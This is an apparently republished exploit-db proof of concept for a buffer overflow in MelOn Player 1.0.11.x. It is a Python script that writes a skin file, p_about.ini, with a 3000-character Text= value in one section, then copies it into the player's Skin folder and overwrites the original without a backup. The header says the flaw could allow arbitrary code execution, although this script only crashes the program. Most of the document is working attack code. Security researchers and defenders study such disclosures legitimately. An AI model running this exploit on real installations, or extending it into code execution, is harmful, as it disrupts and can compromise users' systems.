MelOn Player 1.0.11.x – Denial of Service (PoC)

  • 作者: modpr0be
    日期: 2011-09-09
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/17815/
  • # Exploit Title: MelOn Player 1.0.11.x Denial of Service POC
    # Date: 09/09/2011
    # Author: modpr0be
    # Software Link: http://www.melon.co.id/cs/guide/download/player.do
    # Vulnerable version: 1.0.11.x
    # Tested on: Windows XP SP3 (VirtualBox 4.1.0 r73009)
    # CVE : N/A
    # Thanks: offsec, exploit-db, corelan-team, 5M7X, loneferret, mr_me, _sinner
    
    #### Software description:
    # Melon Player is a well-known application in Indonesia for playing songs provided by
    # the Melon portal (http://www.melon.co.id). It can play music file types such as
    # mp3, wav, wma, mp4, and others, either from files on your local computer or by
    # streaming online from the Melon portal.
    # The songs can also be downloaded to your local computer.
    #
    #### Vulnerable information:
    # The main program (IDMelonPlayer.exe) suffers from a buffer overflow vulnerability
    # when it opens the p_about.ini file. (Note: p_about.ini is a configuration file that
    # is part of the skin template. It holds the program information, which can be viewed
    # from the menu (Menu → Information).) The overflow results from adding extra bytes to
    # part of the file (the Text section), giving an attacker the possibility of executing
    # arbitrary code on a system where Melon Player is installed.
    #
    ### Some Conditions:
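    # This is only a PoC: it just crashes the program and does not demonstrate code execution.
    # The script delivers the file by copying it into the player's Skin directory, so write
    # access to that folder is needed.
    # And it's Unicode ;)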
    #
    ##
    
    #!/usr/bin/python
    
    import os,sys,shutil,time
    
    # Leading part of the generated p_about.ini, reproduced unchanged: the [MAIN]
    # layout, background/mask tiles, both buttons, the static image and the first
    # text label ([TEXT_1]). Nothing in this part is oversized.
    header = """[MAIN]
    MainStyle=SKIN
    Resize=NO
    Mask=YES
    BGStyle=IMAGE
    DefSize=0,0,427,136
    Image=skin.bmp
    Button=2
    Slider=
    Static=1
    Text=4
    Edit=
    Combo=
    
    
    [MAINBG]
    TopLeft=145,389,6,21
    TopCenter=153,389,11,21
    TopRight=166,389,6,21
    MiddleLeft=145,412,6,21
    MiddleCenter=153,412,11,21
    MiddleRight=166,412,6,21
    BottomLeft=145,435,6,34
    BottomCenter=153,435,11,34
    BottomRight=166,435,6,34
    
    [MAINMASK]
    TopLeft=174,389,10,10
    TopCenter=185,389,10,10
    TopRight=196,389,10,10
    MiddleLeft=185,389,10,10
    MiddleCenter=185,389,10,10
    MiddleRight=185,389,10,10
    BottomLeft=174,400,10,10
    BottomCenter=185,389,10,10
    BottomRight=196,400,10,10
    
    
    [BUTTON_1]
    Name=??
    ID=1001
    ResizeStyle=TOP_LEFT
    Tooltip=
    CheckBox=FALSE
    Position=410,4,13,13
    NormalRect=223,389,13,13
    OverRect=238,389,13,13
    DownRect=253,389,13,13
    DisabledRect=223,389,13,13
    MaskRect=2000,0,13,13
    
    [BUTTON_2]
    Name=??
    ID=1002
    ResizeStyle=TOP_LEFT
    Tooltip=
    CheckBox=FALSE
    Position=173,105,80,20
    NormalRect=0,763,80,20
    OverRect=0,763,80,20
    DownRect=81,763,80,20
    DisabledRect=162,763,80,20
    MaskRect=2000,0,80,20
    
    
    [STATIC_1]
    Name=???_??
    ID=2001
    Position=20,31,72,84
    TopLeft=14,478,72,84
    TopCenter=
    TopRight=
    MiddleLeft=
    MiddleCenter=
    MiddleRight=
    BottomLeft=
    BottomCenter=
    BottomRight=
    
    
    [TEXT_1]
    Name=popup Name sdw
    ID=3701
    Position=2,2,420,14
    Text=MelOn Player
    Font=Arial
    FontSize=12
    FontBold=
    Align=CENTER
    FontColor=0,0,0
    """
    
    # Trailing part of the generated p_about.ini, reproduced unchanged: the
    # version label ([TEXT_3]) and the copyright label ([TEXT_4]).
    footer = """
    [TEXT_3]
    Name=????
    ID=3703
    Position=104,50,243,14
    Text=Melon Player Version 1.0.0.101102
    Font=Arial
    FontSize=12
    FontBold=
    Align=
    FontColor=0,0,0
    
    [TEXT_4]
    Name=Copyright
    ID=3704
    Position=104,72,303,14
    Text=Copyright PT. Melon Indonesia. All Right Reserved.
    Font=Arial
    FontSize=12
    FontBold=
    Align=
    FontColor=0,0,0
    """
    
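    # Name of the skin "about" file this script generates, and its absolute path
    # in the current working directory, where it is written before being copied.
    filename = "p_about.ini"
    splash = os.path.abspath(filename)
    # Raw string: the backslashes are path separators, not escapes. The non-raw
    # literal only produced the right value because \P, \M and \S happen not to
    # be escape sequences (newer Python versions warn about that).
    skindir = r"C:\Program Files\MelonPlayerID\Skin"
    # Filler for the Text= value of [TEXT_2]: 3000 "A" characters.
    junk = "A" * 3000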
    
    # [TEXT_2] is the one section that differs from a normal skin file: its Text=
    # value is the filler string (junk). Every other label in this template holds
    # a short caption, so a Text= value of this length stands out when a skin
    # .ini file is inspected. The section ends with an explicit CR LF.
    buggy = """
    [TEXT_2]
    Name=popup Name
    ID=3702
    Position=3,3,420,14
    Text=""" + junk + """
    Font=Arial
    FontSize=12
    FontBold=
    Align=CENTER
    FontColor=170,170,170\r\n"""
    
    # Console banner printed once before the progress messages.
    banner = """
    [*] MelOnPlayer 1.0.11.x Denial of Service POC
    [*] modpr0be[at]spentera[dot]com.
    [*] thanks a lot: cyb3r.anbu | otoy :)
    =====================================================
    """
    
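    # Write the PoC p_about.ini to the working directory and copy it into the
    # installed player's Skin folder.
    #
    # Changes from the original flow:
    #   * the platform and install checks run before anything is opened, so an
    #     unsupported host no longer gets an empty p_about.ini and a leaked handle;
    #   * the file is written inside a `with` block, so it is closed even if the
    #     write fails, and opening it is covered by the IOError handler;
    #   * the builtin name `file` is no longer shadowed;
    #   * failure paths exit with status 1 instead of 0;
    #   * print is called with one parenthesised argument, which produces the
    #     same output on Python 2 and Python 3.
    if os.name != 'nt':
        print("[-] Please run this script on Windows.")
        sys.exit(1)
    if not os.path.isdir(skindir):
        print("[-] Could not find Skin directory, is MelOn Player installed?")
        sys.exit(1)
    try:
        print(banner)
        print("[*] Creating the malicious .ini file..")
        # Text mode is kept from the original script.
        with open(filename, 'w') as ini_file:
            ini_file.write(header + buggy + footer)
        time.sleep(2)
        print("[*] Malicious file (POC) %s created.." % filename)
        print("[*] Path: %s" % splash)
        # copy2 replaces the p_about.ini already present in the Skin folder and
        # no backup is taken; keep a copy of the original file if the player
        # has to be restored after the test.
        shutil.copy2(splash, skindir)
        print("[*] File %s has been copied to %s" % (filename, skindir))
    except IOError:
        print("[-] Could not write to destination folder, check permission..")
        sys.exit(1)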